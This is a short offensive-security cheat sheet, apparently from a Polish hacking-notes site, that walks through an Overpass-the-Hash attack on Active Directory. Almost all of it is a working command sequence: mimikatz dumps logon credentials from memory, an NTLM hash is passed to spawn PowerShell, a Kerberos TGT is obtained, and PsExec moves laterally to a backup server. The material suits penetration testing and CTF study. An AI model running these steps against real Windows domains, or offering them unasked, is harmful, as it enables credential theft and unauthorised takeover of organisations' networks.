>_ shadow.red
notatki-hakera.pl YouTube CTF Solutions Channel ☕ Buy me a coffee
~ / Active Directory / Overpass-the-Hash

Overpass-the-Hash

Active Directory AD Attacks windows

Convert an NTLM hash into a usable Kerberos TGT, bypassing NTLM auth restrictions.

Step 1 - Dump the hash with mimikatz

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

Step 2 - Spawn a process with the hash injected

mimikatz # sekurlsa::pth /user:marek /domain:firma.com /ntlm:a87f3b2c91e5d4a06f8823bc1e40d529 /run:powershell

A new PowerShell window opens. Note: whoami still shows the original user - this is expected; only Kerberos tickets are imported.

Step 3 - Generate the TGT

klist
net use \\FIRMA
klist

After contacting any domain resource, a TGT for the target user appears.

Step 4 - Lateral movement (PsExec accepts Kerberos)

.\PsExec.exe \\BACKUP-SRV cmd
whoami
hostname